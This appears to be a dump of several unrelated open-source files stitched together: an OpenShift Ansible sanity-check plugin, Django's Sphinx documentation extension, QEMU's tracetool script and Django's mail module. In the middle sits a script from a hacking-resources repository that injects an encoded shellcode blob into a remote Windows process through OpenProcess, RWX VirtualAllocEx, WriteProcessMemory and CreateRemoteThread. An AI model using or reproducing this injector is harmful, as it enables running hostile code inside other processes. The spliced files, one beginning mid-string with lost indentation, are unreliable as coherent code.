You specified openshift_image_tag={}"""

# Each entry pairs the validation regex with its error message; selected
# per deployment type through IMAGE_TAG_REGEX below.
ORIGIN_TAG_REGEX = {'re': '(^v?\\d+\\.\\d+\\.\\d+(-[\\w\\-\\.]*)?$)',
                    'error_msg': ORIGIN_TAG_REGEX_ERROR}
ENTERPRISE_TAG_REGEX = {'re': '(^v\\d+\\.\\d+(\\.\\d+)*(-\\d+(\\.\\d+)*)?$)',
                        'error_msg': ENTERPRISE_TAG_REGEX_ERROR}
IMAGE_TAG_REGEX = {'origin': ORIGIN_TAG_REGEX,
                   'openshift-enterprise': ENTERPRISE_TAG_REGEX}

CONTAINERIZED_NO_TAG_ERROR_MSG = """To install a containerized Origin release,
you must set openshift_release or openshift_image_tag in your inventory to
specify which version of the OpenShift component images to use.
(Suggestion: add openshift_release="x.y" to inventory.)"""
def to_bool(var_to_check):
    """Determine a boolean value given the multiple
    ways bools can be specified in ansible."""
    # http://yaml.org/type/bool.html
    # A tuple (not a set) is used deliberately: membership falls back to
    # equality, so unhashable inputs simply compare False instead of raising.
    truthy_values = (True, 1,
                     "True", "1", "true", "TRUE",
                     "Yes", "yes", "Y", "y", "YES",
                     "on", "ON", "On")
    return var_to_check in truthy_values
class ActionModule(ActionBase):
"""Action plugin to execute sanity checks."""
def template_var(self, hostvars, host, varname):
    """Retrieve a variable from hostvars and template it.
    If undefined, return None type."""
    raw_value = hostvars[host].get(varname)
    return None if raw_value is None else self._templar.template(raw_value)
def check_openshift_deployment_type(self, hostvars, host):
    """Ensure a valid openshift_deployment_type is set"""
    deployment_type = self.template_var(hostvars, host,
                                        'openshift_deployment_type')
    if deployment_type not in VALID_DEPLOYMENT_TYPES:
        # Report every accepted value in the error so the user can fix
        # the inventory without digging through the source.
        raise errors.AnsibleModuleError(
            "openshift_deployment_type must be defined and one of {}".format(
                ", ".join(VALID_DEPLOYMENT_TYPES)))
    return deployment_type
def check_python_version(self, hostvars, host, distro):
"""Ensure python version is 3 for Fedora and python 2 for others"""
ansible_python = self.template_var(hostvars, host, 'ansible_python')
if distro == "Fedora":
if ansible_python['version']['major'] != 3:
msg = "openshift-ansible requires Python 3 for {};".format(distro)
msg += " For information on enabling Python 3 with Ansible,"
msg += " see https://docs.ansible.com/ansible/python_3_support.html"
raise errors.AnsibleModuleError(msg)
else:
if ansible_python['version']['major'] != 2:
msg = "openshift-ansible requires Python 2 for {};".format(distro)
def check_image_tag_format(self, hostvars, host, openshift_deployment_type):
"""Ensure openshift_image_tag is formatted correctly"""
openshift_image_tag = self.template_var(hostvars, host, 'openshift_image_tag')
if not openshift_image_tag or openshift_image_tag == 'latest':
return None
regex_to_match = IMAGE_TAG_REGEX[openshift_deployment_type]['re']
res = re.match(regex_to_match, str(openshift_image_tag))
if res is None:
msg = IMAGE_TAG_REGEX[openshift_deployment_type]['error_msg']
msg = msg.format(str(openshift_image_tag))
raise errors.AnsibleModuleError(msg)
def no_origin_image_version(self, hostvars, host, openshift_deployment_type):
"""Ensure we can determine what image version to use with origin
fail when:
- openshift_is_containerized
- openshift_deployment_type == 'origin'
- openshift_release is not defined
- openshift_image_tag is not defined"""
if not openshift_deployment_type == 'origin':
return None
oic = self.template_var(hostvars, host, 'openshift_is_containerized')
if not to_bool(oic):
return None
orelease = self.template_var(hostvars, host, 'openshift_release')
oitag = self.template_var(hostvars, host, 'openshift_image_tag')
if not orelease and not oitag:
raise errors.AnsibleModuleError(CONTAINERIZED_NO_TAG_ERROR_MSG)
def network_plugin_check(self, hostvars, host):
"""Ensure only one type of network plugin is enabled"""
res = []
# Loop through each possible network plugin boolean, determine the
# actual boolean value, and append results into a list.
for plugin, default_val in NET_PLUGIN_LIST:
res_temp = self.template_var(hostvars, host, plugin)
if res_temp is None:
res_temp = default_val
res.append(to_bool(res_temp))
if sum(res) != 1:
plugin_str = list(zip([x[0] for x in NET_PLUGIN_LIST], res))
msg = "Host Checked: {} Only one of must be true. Found: {}".format(host, plugin_str)
raise errors.AnsibleModuleError(msg)
def check_hostname_vars(self, hostvars, host):
"""Checks to ensure openshift_hostname
and openshift_public_hostname
conform to the proper length of 63 characters or less"""
for varname in ('openshift_public_hostname', 'openshift_hostname'):
var_value = self.template_var(hostvars, host, varname)
if var_value and len(var_value) > 63:
msg = '{} must be 63 characters or less'.format(varname)
raise errors.AnsibleModuleError(msg)
def run_checks(self, hostvars, host):
"""Execute the hostvars validations against host"""
distro = self.template_var(hostvars, host, 'ansible_distribution')
odt = self.check_openshift_deployment_type(hostvars, host)
self.check_python_version(hostvars, host, distro)
self.check_image_tag_format(hostvars, host, odt)
self.no_origin_image_version(hostvars, host, odt)
self.network_plugin_check(hostvars, host)
self.check_hostname_vars(hostvars, host)
def run(self, tmp=None, task_vars=None):
result = super(ActionModule, self).run(tmp, task_vars)
# self.task_vars holds all in-scope variables.
# Ignore settting self.task_vars outside of init.
# pylint: disable=W0201
self.task_vars = task_vars or {}
# self._task.args holds task parameters.
# check_hosts is a parameter to this plugin, and should provide
# a list of hosts.
check_hosts = self._task.args.get('check_hosts')
if not check_hosts:
msg = "check_hosts is required"
raise errors.AnsibleModuleError(msg)
# We need to access each host's variables
hostvars = self.task_vars.get('hostvars')
if not hostvars:
msg = hostvars
raise errors.AnsibleModuleError(msg)
# We loop through each host in the provided list check_hosts
for host in check_hosts:
self.run_checks(hostvars, host)
result["changed"] = False
result["failed"] = False
result["msg"] = "Sanity Checks passed"
return result
| apache-2.0 |
zhoulingjun/django | docs/_ext/djangodocs.py | 321 | 12049 | """
Sphinx plugins for Django documentation.
"""
import json
import os
import re
from docutils import nodes
from docutils.parsers.rst import directives
from sphinx import __version__ as sphinx_ver, addnodes
from sphinx.builders.html import StandaloneHTMLBuilder
from sphinx.util.compat import Directive
from sphinx.util.console import bold
from sphinx.util.nodes import set_source_info
from sphinx.writers.html import SmartyPantsHTMLTranslator
# RE for option descriptions without a '--' prefix: group 1 captures the
# option name, group 2 its (possibly empty) arguments, stopping before the
# next comma-separated alternative spelling or end of string.
simple_option_desc_re = re.compile(
    r'([-_a-zA-Z0-9]+)(\s*.*?)(?=,\s+(?:/|-|--)|$)')
def setup(app):
    """Sphinx extension entry point: register Django's custom cross-reference
    types, django-admin description units, version/snippet directives and the
    custom HTML builder on *app*."""
    # Simple cross-reference types: each call registers a directive/role pair
    # plus an index-entry template.
    app.add_crossref_type(
        directivename="setting",
        rolename="setting",
        indextemplate="pair: %s; setting",
    )
    app.add_crossref_type(
        directivename="templatetag",
        rolename="ttag",
        indextemplate="pair: %s; template tag"
    )
    app.add_crossref_type(
        directivename="templatefilter",
        rolename="tfilter",
        indextemplate="pair: %s; template filter"
    )
    app.add_crossref_type(
        directivename="fieldlookup",
        rolename="lookup",
        indextemplate="pair: %s; field lookup type",
    )
    # Description units get a parse_node hook to render the signature.
    app.add_description_unit(
        directivename="django-admin",
        rolename="djadmin",
        indextemplate="pair: %s; django-admin command",
        parse_node=parse_django_admin_node,
    )
    app.add_description_unit(
        directivename="django-admin-option",
        rolename="djadminopt",
        indextemplate="pair: %s; django-admin command-line option",
        parse_node=parse_django_adminopt_node,
    )
    app.add_config_value('django_next_version', '0.0', True)
    app.add_directive('versionadded', VersionDirective)
    app.add_directive('versionchanged', VersionDirective)
    app.add_builder(DjangoStandaloneHTMLBuilder)
    # register the snippet directive
    app.add_directive('snippet', SnippetWithFilename)
    # register a node for snippet directive so that the xml parser
    # knows how to handle the enter/exit parsing event
    app.add_node(snippet_with_filename,
                 html=(visit_snippet, depart_snippet_literal),
                 latex=(visit_snippet_latex, depart_snippet_latex),
                 man=(visit_snippet_literal, depart_snippet_literal),
                 text=(visit_snippet_literal, depart_snippet_literal),
                 texinfo=(visit_snippet_literal, depart_snippet_literal))
class snippet_with_filename(nodes.literal_block):
    """
    Subclass the literal_block to override the visit/depart event handlers
    """
    pass
# Fallback visit/depart handlers (used by the man/text/texinfo builders, see
# setup() above) that render the snippet like an ordinary literal block.
# `self` is the document translator instance the handler is bound to.
def visit_snippet_literal(self, node):
    """
    default literal block handler
    """
    self.visit_literal_block(node)
def depart_snippet_literal(self, node):
    """
    default literal block handler
    """
    self.depart_literal_block(node)
def visit_snippet(self, node):
    """
    HTML document generator visit handler
    """
    lang = self.highlightlang
    # Turn line numbers on once the snippet is long enough.
    linenos = node.rawsource.count('\n') >= self.highlightlinenothreshold - 1
    fname = node['filename']
    highlight_args = node.get('highlight_args', {})
    if 'language' in node:
        # code-block directives
        lang = node['language']
        highlight_args['force'] = True
    if 'linenos' in node:
        linenos = node['linenos']
    def warner(msg):
        self.builder.warn(msg, (self.builder.current_docname, node.line))
    highlighted = self.highlighter.highlight_block(node.rawsource, lang,
                                                   warn=warner,
                                                   linenos=linenos,
                                                   **highlight_args)
    starttag = self.starttag(node, 'div', suffix='',
                             CLASS='highlight-%s' % lang)
    self.body.append(starttag)
    # Filename caption above the highlighted code.
    # NOTE(review): the trailing pair of quotes after \n is an empty string
    # literal concatenated onto the format string -- harmless, presumably a
    # leftover typo.
    self.body.append('<div class="snippet-filename">%s</div>\n''' % (fname,))
    self.body.append(highlighted)
    self.body.append('</div>\n')
    # The highlighter already rendered the children; skip normal traversal.
    raise nodes.SkipNode
def visit_snippet_latex(self, node):
    """
    Latex document generator visit handler
    """
    # Start collecting the raw snippet text into self.verbatim; the actual
    # rendering happens in depart_snippet_latex().
    self.verbatim = ''
def depart_snippet_latex(self, node):
    """
    Latex document generator depart handler.
    """
    code = self.verbatim.rstrip('\n')
    # Highlight language and line-number threshold from the current settings.
    lang = self.hlsettingstack[-1][0]
    linenos = code.count('\n') >= self.hlsettingstack[-1][1] - 1
    fname = node['filename']
    highlight_args = node.get('highlight_args', {})
    if 'language' in node:
        # code-block directives
        lang = node['language']
        highlight_args['force'] = True
    if 'linenos' in node:
        linenos = node['linenos']
    def warner(msg):
        self.builder.warn(msg, (self.curfilestack[-1], node.line))
    hlcode = self.highlighter.highlight_block(code, lang, warn=warner,
                                              linenos=linenos,
                                              **highlight_args)
    # Filename caption: a grey box above the verbatim block.
    self.body.append('\n{\\colorbox[rgb]{0.9,0.9,0.9}'
                     '{\\makebox[\\textwidth][l]'
                     '{\\small\\texttt{%s}}}}\n' % (fname,))
    if self.table:
        # Inside tables the plain Verbatim environment breaks; switch to
        # OriginalVerbatim and flag the table accordingly.
        hlcode = hlcode.replace('\\begin{Verbatim}',
                                '\\begin{OriginalVerbatim}')
        self.table.has_problematic = True
        self.table.has_verbatim = True
    hlcode = hlcode.rstrip()[:-14]  # strip \end{Verbatim}
    hlcode = hlcode.rstrip() + '\n'
    # Re-append the matching \end{...Verbatim} for whichever variant is open.
    self.body.append('\n' + hlcode + '\\end{%sVerbatim}\n' %
                     (self.table and 'Original' or ''))
    self.verbatim = None
class SnippetWithFilename(Directive):
    """
    The 'snippet' directive that allows to add the filename (optional)
    of a code snippet in the document. This is modeled after CodeBlock.
    """
    has_content = True
    optional_arguments = 1
    option_spec = {'filename': directives.unchanged_required}
    def run(self):
        """Build a snippet_with_filename node from the directive content."""
        code = '\n'.join(self.content)
        literal = snippet_with_filename(code, code)
        if self.arguments:
            # The optional positional argument is the highlight language.
            literal['language'] = self.arguments[0]
        # NOTE(review): raises KeyError if :filename: is omitted, so the
        # option is effectively mandatory despite the class name -- confirm.
        literal['filename'] = self.options['filename']
        set_source_info(self, literal)
        return [literal]
class VersionDirective(Directive):
    """Implements ``versionadded``/``versionchanged``, emitting a
    versionmodified node; the configured django_next_version is displayed
    as "Development version" instead of a number."""
    has_content = True
    required_arguments = 1
    optional_arguments = 1
    final_argument_whitespace = True
    option_spec = {}
    def run(self):
        if len(self.arguments) > 1:
            msg = """Only one argument accepted for directive '{directive_name}::'.
            Comments should be provided as content,
            not as an extra argument.""".format(directive_name=self.name)
            raise self.error(msg)
        env = self.state.document.settings.env
        ret = []
        node = addnodes.versionmodified()
        ret.append(node)
        if self.arguments[0] == env.config.django_next_version:
            # The not-yet-released version is labelled generically.
            node['version'] = "Development version"
        else:
            node['version'] = self.arguments[0]
        node['type'] = self.name
        if self.content:
            self.state.nested_parse(self.content, self.content_offset, node)
        # Record the change so Sphinx can build the "changes" overview.
        env.note_versionchange(node['type'], node['version'], node, self.lineno)
        return ret
class DjangoHTMLTranslator(SmartyPantsHTMLTranslator):
    """
    Django-specific reST to HTML tweaks.
    """
    # Don't use border=1, which docutils does by default.
    def visit_table(self, node):
        self.context.append(self.compact_p)
        self.compact_p = True
        self._table_row_index = 0  # Needed by Sphinx
        self.body.append(self.starttag(node, 'table', CLASS='docutils'))
    def depart_table(self, node):
        # Restore the compact_p flag saved in visit_table().
        self.compact_p = self.context.pop()
        self.body.append('</table>\n')
    def visit_desc_parameterlist(self, node):
        self.body.append('(')  # by default sphinx puts <big> around the "("
        self.first_param = 1
        self.optional_param_level = 0
        self.param_separator = node.child_text_separator
        self.required_params_left = sum([isinstance(c, addnodes.desc_parameter)
                                         for c in node.children])
    def depart_desc_parameterlist(self, node):
        self.body.append(')')
    # Old Sphinx applied SmartyPants inside literal blocks; disable it there
    # by bracketing the default handlers with the no_smarty counter.
    if sphinx_ver < '1.0.8':
        #
        # Don't apply smartypants to literal blocks
        #
        def visit_literal_block(self, node):
            self.no_smarty += 1
            SmartyPantsHTMLTranslator.visit_literal_block(self, node)
        def depart_literal_block(self, node):
            SmartyPantsHTMLTranslator.depart_literal_block(self, node)
            self.no_smarty -= 1
    #
    # Turn the "new in version" stuff (versionadded/versionchanged) into a
    # better callout -- the Sphinx default is just a little span,
    # which is a bit less obvious that I'd like.
    #
    # FIXME: these messages are all hardcoded in English. We need to change
    # that to accommodate other language docs, but I can't work out how to make
    # that work.
    #
    version_text = {
        'versionchanged': 'Changed in Django %s',
        'versionadded': 'New in Django %s',
    }
    def visit_versionmodified(self, node):
        self.body.append(
            self.starttag(node, 'div', CLASS=node['type'])
        )
        version_text = self.version_text.get(node['type'])
        if version_text:
            # Trailing ':' when the node has body content, '.' otherwise.
            title = "%s%s" % (
                version_text % node['version'],
                ":" if len(node) else "."
            )
            self.body.append('<span class="title">%s</span> ' % title)
    def depart_versionmodified(self, node):
        self.body.append("</div>\n")
    # Give each section a unique ID -- nice for custom CSS hooks
    def visit_section(self, node):
        # Prefix the ids with 's-' for the rendered anchor, but restore the
        # original list afterwards so later consumers see unprefixed ids.
        old_ids = node.get('ids', [])
        node['ids'] = ['s-' + i for i in old_ids]
        node['ids'].extend(old_ids)
        SmartyPantsHTMLTranslator.visit_section(self, node)
        node['ids'] = old_ids
def parse_django_admin_node(env, sig, signode):
    """Parse a ``django-admin`` directive signature.

    Records the command name (the first word of the signature) on the build
    environment, renders the signature as ``django-admin <sig>`` and returns
    the raw signature for indexing.
    """
    env._django_curr_admin_command = sig.split(' ')[0]
    display = "django-admin %s" % sig
    signode += addnodes.desc_name(display, display)
    return sig
def parse_django_adminopt_node(env, sig, signode):
    """A copy of sphinx.directives.CmdoptionDesc.parse_signature()

    Parses a command-line option signature (e.g. ``--verbosity=VERBOSITY``),
    appending each "name, args" pair to *signode*, and returns the name of
    the first option found. Options written without a leading dash are
    handled by a fallback regex. Raises ValueError when nothing parses.
    """
    from sphinx.domains.std import option_desc_re

    def _append_options(regex):
        # Append every "name args" pair matched by *regex* to signode and
        # return the first option name ('' when there was no match).
        first = ''
        for i, m in enumerate(regex.finditer(sig)):
            optname, args = m.groups()
            if i:
                signode += addnodes.desc_addname(', ', ', ')
            signode += addnodes.desc_name(optname, optname)
            signode += addnodes.desc_addname(args, args)
            if not i:
                first = optname
        return first

    # Prefer the standard "--option" syntax; fall back to bare option names.
    # (Both regexes require a non-empty name, so '' means "no match at all".)
    firstname = _append_options(option_desc_re)
    if not firstname:
        firstname = _append_options(simple_option_desc_re)
    if not firstname:
        raise ValueError
    return firstname
class DjangoStandaloneHTMLBuilder(StandaloneHTMLBuilder):
    """
    Subclass to add some extra things we need.
    """
    name = 'djangohtml'
    def finish(self):
        """After the normal HTML build, dump the names of all template tags
        and filters documented in ref/templates/builtins to a JS file."""
        super(DjangoStandaloneHTMLBuilder, self).finish()
        self.info(bold("writing templatebuiltins.js..."))
        # xrefs maps (type, name) -> (docname, anchor) for every cross-ref.
        xrefs = self.env.domaindata["std"]["objects"]
        templatebuiltins = {
            "ttags": [n for ((t, n), (l, a)) in xrefs.items()
                      if t == "templatetag" and l == "ref/templates/builtins"],
            "tfilters": [n for ((t, n), (l, a)) in xrefs.items()
                         if t == "templatefilter" and l == "ref/templates/builtins"],
        }
        outfilename = os.path.join(self.outdir, "templatebuiltins.js")
        with open(outfilename, 'w') as fp:
            fp.write('var django_template_builtins = ')
            json.dump(templatebuiltins, fp)
            fp.write(';\n')
| bsd-3-clause |
bt3gl/My-Gray-Hacker-Resources | Vulnerabilities_and_Exploits/Payloads/inject_shellcode_into_remote_process.py | 4 | 2351 | # import ctypes to interact witht eh Windows API
from ctypes import *
# sets the section of memory that stores shellcode as RWX
page_rwx_value = 0x40
# all possible rights
process_all = 0x1F0FFF
# allocate memory, ensure it is zeroed for writting to memory
memcommit = 0x00001000
# stores the available calls from windll.kernel32
kernel32_variable = windll.kernel32
shellcode = "\xbb\xbb\x48\x30\x8d\xdb\xdd\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x47\x83\xe8\xfc\x31\x58\x0f\x03\x58\xb4\xaa\xc5\x71\x22\xa8\x26\x8a\xb2\xcd\xaf\x6f\x83\xcd\xd4\xe4\xb3\xfd\x9f\xa9\x3f\x75\xcd\x59\xb4\xfb\xda\x6e\x7d\xb1\x3c\x40\x7e\xea\x7d\xc3\xfc\xf1\x51\x23\x3d\x3a\xa4\x22\x7a\x27\x45\x76\xd3\x23\xf8\x67\x50\x79\xc1\x0c\x2a\x6f\x41\xf0\xfa\x8e\x60\xa7\x71\xc9\xa2\x49\x56\x61\xeb\x51\xbb\x4c\xa5\xea\x0f\x3a\x34\x3b\x5e\xc3\x9b\x02\x6f\x36\xe5\x43\x57\xa9\x90\xbd\xa4\x54\xa3\x79\xd7\x82\x26\x9a\x7f\x40\x90\x46\x7e\x85\x47\x0c\x8c\x62\x03\x4a\x90\x75\xc0\xe0\xac\xfe\xe7\x26\x25\x44\xcc\xe2\x6e\x1e\x6d\xb2\xca\xf1\x92\xa4\xb5\xae\x36\xae\x5b\xba\x4a\xed\x33\x0f\x67\x0e\xc3\x07\xf0\x7d\xf1\x88\xaa\xe9\xb9\x41\x75\xed\xbe\x7b\xc1\x61\x41\x84\x32\xab\x85\xd0\x62\xc3\x2c\x59\xe9\x13\xd1\x8c\xbe\x43\x7d\x7f\x7f\x34\x3d\x2f\x17\x5e\xb2\x10\x07\x61\x19\x39\xa2\x9b\xc9\x86\x9b\x9b\x96\x6f\xde\xe3\x89\x8c\x57\x05\xa3\x42\x3e\x9d\x5b\xfa\x1b\x55\xfa\x03\xb6\x13\x3c\x8f\x35\xe3\xf2\x78\x33\xf7\x62\x89\x0e\xa5\x24\x96\xa4\xc0\xc8\x02\x43\x43\x9f\xba\x49\xb2\xd7\x64\xb1\x91\x6c\xac\x27\x5a\x1a\xd1\xa7\x5a\xda\x87\xad\x5a\xb2\x7f\x96\x08\xa7\x7f\x03\x3d\x74\xea\xac\x14\x29\xbd\xc4\x9a\x14\x89\x4a\x64\x73\x0b\xb6\xb3\xbd\x79\xd6\x07"
# PID of the process the shellcode will be injected into (placeholder value).
process_id = 1234
shellcode_length = len(shellcode)
# OpenProcess: obtain a handle to the target process with full access.
# NOTE(review): no return-value checking anywhere below; each call returns
# 0/NULL on failure.
process_handle = kernel32_variable.OpenProcess(process_all, False, process_id)
# VirtualAllocEx: allocate RWX memory inside the remote process.
memory_allocation_variable = kernel32_variable.VirtualAllocEx(process_handle, 0, shellcode_length, memcommit, page_rwx_value)
# WriteProcessMemory: copy the shellcode into the allocated remote region.
kernel32_variable.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, shellcode_length, 0)
# CreateRemoteThread: start a thread in the other process at the shellcode.
kernel32_variable.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, 0, 0, 0) | mit |
oritwas/qemu | scripts/tracetool.py | 111 | 3993 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Command-line wrapper for the tracetool machinery.
"""
__author__ = "Lluís Vilanova <vilanova@ac.upc.edu>"
__copyright__ = "Copyright 2012, Lluís Vilanova <vilanova@ac.upc.edu>"
__license__ = "GPL version 2 or (at your option) any later version"
__maintainer__ = "Stefan Hajnoczi"
__email__ = "stefanha@linux.vnet.ibm.com"
import sys
import getopt
from tracetool import error_write, out
import tracetool.backend
import tracetool.format
# Name of this script (argv[0]); filled in by main() and used in usage output.
_SCRIPT = ""
def error_opt(msg = None):
    """Print usage information to stderr and exit.

    When *msg* is given it is reported as an error and the process exits
    with status 1; otherwise (plain --help) it exits with status 0.
    """
    if msg is not None:
        error_write("Error: " + msg + "\n")
    # Build an indented "name description" listing of backends and formats.
    backend_descr = "\n".join([ " %-15s %s" % (n, d)
                                for n,d in tracetool.backend.get_list() ])
    format_descr = "\n".join([ " %-15s %s" % (n, d)
                               for n,d in tracetool.format.get_list() ])
    error_write("""\
Usage: %(script)s --format=<format> --backend=<backend> [<options>]
Backends:
%(backends)s
Formats:
%(formats)s
Options:
    --help This help message.
    --list-backends Print list of available backends.
    --check-backend Check if the given backend is valid.
    --binary <path> Full path to QEMU binary.
    --target-type <type> QEMU emulator target type ('system' or 'user').
    --target-arch <arch> QEMU emulator target arch.
    --probe-prefix <prefix> Prefix for dtrace probe names
                            (default: qemu-<target-type>-<target-arch>).\
""" % {
            "script" : _SCRIPT,
            "backends" : backend_descr,
            "formats" : format_descr,
        })
    if msg is None:
        sys.exit(0)
    else:
        sys.exit(1)
def main(args):
global _SCRIPT
_SCRIPT = args[0]
long_opts = [ "backend=", "format=", "help", "list-backends", "check-backend" ]
long_opts += [ "binary=", "target-type=", "target-arch=", "probe-prefix=" ]
try:
opts, args = getopt.getopt(args[1:], "", long_opts)
except getopt.GetoptError, err:
error_opt(str(err))
check_backend = False
arg_backend = ""
arg_format = ""
binary = None
target_type = None
target_arch = None
probe_prefix = None
for opt, arg in opts:
if opt == "--help":
error_opt()
elif opt == "--backend":
arg_backend = arg
elif opt == "--format":
arg_format = arg
elif opt == "--list-backends":
backends = tracetool.backend.get_list()
out(", ".join([ b for b,_ in backends ]))
sys.exit(0)
elif opt == "--check-backend":
check_backend = True
elif opt == "--binary":
binary = arg
elif opt == '--target-type':
target_type = arg
elif opt == '--target-arch':
target_arch = arg
elif opt == '--probe-prefix':
probe_prefix = arg
else:
error_opt("unhandled option: %s" % opt)
if arg_backend is None:
error_opt("backend not set")
if check_backend:
if tracetool.backend.exists(arg_backend):
sys.exit(0)
else:
sys.exit(1)
if arg_format == "stap":
if binary is None:
error_opt("--binary is required for SystemTAP tapset generator")
if probe_prefix is None and target_type is None:
error_opt("--target-type is required for SystemTAP tapset generator")
if probe_prefix is None and target_arch is None:
error_opt("--target-arch is required for SystemTAP tapset generator")
if probe_prefix is None:
probe_prefix = ".".join([ "qemu", target_type, target_arch ])
try:
tracetool.generate(sys.stdin, arg_format, arg_backend,
binary = binary, probe_prefix = probe_prefix)
except tracetool.TracetoolError, e:
error_opt(str(e))
if __name__ == "__main__":
main(sys.argv)
| gpl-2.0 |
rebost/django | django/core/mail/message.py | 6 | 13093 | from __future__ import unicode_literals
import mimetypes
import os
import random
import time
from email import charset as Charset, encoders as Encoders
from email.generator import Generator
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.header import Header
from email.utils import formatdate, getaddresses, formataddr, parseaddr
from io import BytesIO
from django.conf import settings
from django.core.mail.utils import DNS_NAME
from django.utils.encoding import smart_str, force_unicode
# Don't BASE64-encode UTF-8 messages so that we avoid unwanted attention from
# some spam filters. (SHORTEST lets the email package pick the shorter of
# quoted-printable/base64 per header.)
Charset.add_charset('utf-8', Charset.SHORTEST, None, 'utf-8')
# Default MIME type to use on attachments (if it is not explicitly given
# and cannot be guessed).
DEFAULT_ATTACHMENT_MIME_TYPE = 'application/octet-stream'
class BadHeaderError(ValueError):
    """Raised by forbid_multi_line_headers() when a header value contains a
    newline, which would allow mail header injection."""
    pass
# Copied from Python standard library, with the following modifications:
# * Used cached hostname for performance.
# * Added try/except to support lack of getpid() in Jython (#5496).
def make_msgid(idstring=None):
    """Return a string suitable for an RFC 2822 compliant Message-ID, e.g:

    <20020201195627.33539.96671@nightshade.la.mastaler.com>

    Optional idstring if given is a string used to strengthen the
    uniqueness of the message id.
    """
    # UTC timestamp + pid + random number makes collisions very unlikely;
    # idstring, when supplied, is appended for extra uniqueness.
    utcdate = time.strftime('%Y%m%d%H%M%S', time.gmtime(time.time()))
    try:
        pid = os.getpid()
    except AttributeError:
        # No getpid() in Jython, for example.
        pid = 1
    rand = random.randrange(100000)
    suffix = '' if idstring is None else '.' + idstring
    # DNS_NAME is the cached local hostname (django.core.mail.utils).
    return '<%s.%s.%s%s@%s>' % (utcdate, pid, rand, suffix, DNS_NAME)
# Header names that contain structured address data (RFC #5322)
ADDRESS_HEADERS = set([
'from',
'sender',
'reply-to',
'to',
'cc',
'bcc',
'resent-from',
'resent-sender',
'resent-to',
'resent-cc',
'resent-bcc',
])
def forbid_multi_line_headers(name, val, encoding):
    """Forbids multi-line headers, to prevent header injection.

    Returns a (name, val) pair with val encoded for use as a header value;
    raises BadHeaderError when val contains a newline."""
    encoding = encoding or settings.DEFAULT_CHARSET
    val = force_unicode(val)
    if '\n' in val or '\r' in val:
        raise BadHeaderError("Header values can't contain newlines (got %r for header %r)" % (val, name))
    try:
        val = val.encode('ascii')
    except UnicodeEncodeError:
        # Non-ASCII value: address headers must have each address sanitized
        # individually; anything else is MIME-encoded as a whole via Header.
        if name.lower() in ADDRESS_HEADERS:
            val = ', '.join(sanitize_address(addr, encoding)
                            for addr in getaddresses((val,)))
        else:
            val = str(Header(val, encoding))
    else:
        # Pure-ASCII subjects still go through Header for proper wrapping.
        if name.lower() == 'subject':
            val = Header(val)
    return smart_str(name), val
def sanitize_address(addr, encoding):
    """Format a single email address for use in a header.

    *addr* is either a "Name <addr>" string or an (nm, addr) pair; the
    display name is MIME-encoded and a non-ASCII domain is IDNA-encoded."""
    if isinstance(addr, basestring):
        addr = parseaddr(force_unicode(addr))
    nm, addr = addr
    nm = str(Header(nm, encoding))
    try:
        addr = addr.encode('ascii')
    except UnicodeEncodeError:  # IDN
        if '@' in addr:
            localpart, domain = addr.split('@', 1)
            localpart = str(Header(localpart, encoding))
            # Internationalized domain names use the IDNA codec.
            domain = domain.encode('idna')
            addr = '@'.join([localpart, domain])
        else:
            addr = str(Header(addr, encoding))
    return formataddr((nm, addr))
class SafeMIMEText(MIMEText):
    """MIMEText that validates headers against injection (via
    forbid_multi_line_headers) and does not mangle 'From ' lines when
    serialized."""
    def __init__(self, text, subtype, charset):
        self.encoding = charset
        MIMEText.__init__(self, text, subtype, charset)
    def __setitem__(self, name, val):
        # Every header set on the message is validated/encoded first.
        name, val = forbid_multi_line_headers(name, val, self.encoding)
        MIMEText.__setitem__(self, name, val)
    def as_string(self, unixfrom=False):
        """Return the entire formatted message as a string.
        Optional `unixfrom' when True, means include the Unix From_ envelope
        header.
        This overrides the default as_string() implementation to not mangle
        lines that begin with 'From '. See bug #13433 for details.
        """
        fp = BytesIO()
        g = Generator(fp, mangle_from_ = False)
        g.flatten(self, unixfrom=unixfrom)
        return fp.getvalue()
class SafeMIMEMultipart(MIMEMultipart):
    """MIMEMultipart counterpart of SafeMIMEText: header-injection-safe and
    'From '-preserving serialization."""
    def __init__(self, _subtype='mixed', boundary=None, _subparts=None, encoding=None, **_params):
        self.encoding = encoding
        MIMEMultipart.__init__(self, _subtype, boundary, _subparts, **_params)
    def __setitem__(self, name, val):
        # Every header set on the message is validated/encoded first.
        name, val = forbid_multi_line_headers(name, val, self.encoding)
        MIMEMultipart.__setitem__(self, name, val)
    def as_string(self, unixfrom=False):
        """Return the entire formatted message as a string.
        Optional `unixfrom' when True, means include the Unix From_ envelope
        header.
        This overrides the default as_string() implementation to not mangle
        lines that begin with 'From '. See bug #13433 for details.
        """
        fp = BytesIO()
        g = Generator(fp, mangle_from_ = False)
        g.flatten(self, unixfrom=unixfrom)
        return fp.getvalue()
class EmailMessage(object):
    """
    A container for email information.
    """
    content_subtype = 'plain'  # MIME subtype of the body ('plain' => text/plain)
    mixed_subtype = 'mixed'    # multipart subtype used when attachments exist
    encoding = None # None => use settings default
    def __init__(self, subject='', body='', from_email=None, to=None, bcc=None,
                 connection=None, attachments=None, headers=None, cc=None):
        """
        Initialize a single email message (which can be sent to multiple
        recipients).
        All strings used to create the message can be unicode strings
        (or UTF-8 bytestrings). The SafeMIMEText class will handle any
        necessary encoding conversions.
        """
        # to/cc/bcc must be sequences of addresses, never a single string
        # (a string would be iterated character by character).
        if to:
            assert not isinstance(to, basestring), '"to" argument must be a list or tuple'
            self.to = list(to)
        else:
            self.to = []
        if cc:
            assert not isinstance(cc, basestring), '"cc" argument must be a list or tuple'
            self.cc = list(cc)
        else:
            self.cc = []
        if bcc:
            assert not isinstance(bcc, basestring), '"bcc" argument must be a list or tuple'
            self.bcc = list(bcc)
        else:
            self.bcc = []
        self.from_email = from_email or settings.DEFAULT_FROM_EMAIL
        self.subject = subject
        self.body = body
        self.attachments = attachments or []
        self.extra_headers = headers or {}
        self.connection = connection
    def get_connection(self, fail_silently=False):
        """Return the backend connection, creating and caching it on first
        use."""
        from django.core.mail import get_connection
        if not self.connection:
            self.connection = get_connection(fail_silently=fail_silently)
        return self.connection
    def message(self):
        """Build and return the underlying MIME message object."""
        encoding = self.encoding or settings.DEFAULT_CHARSET
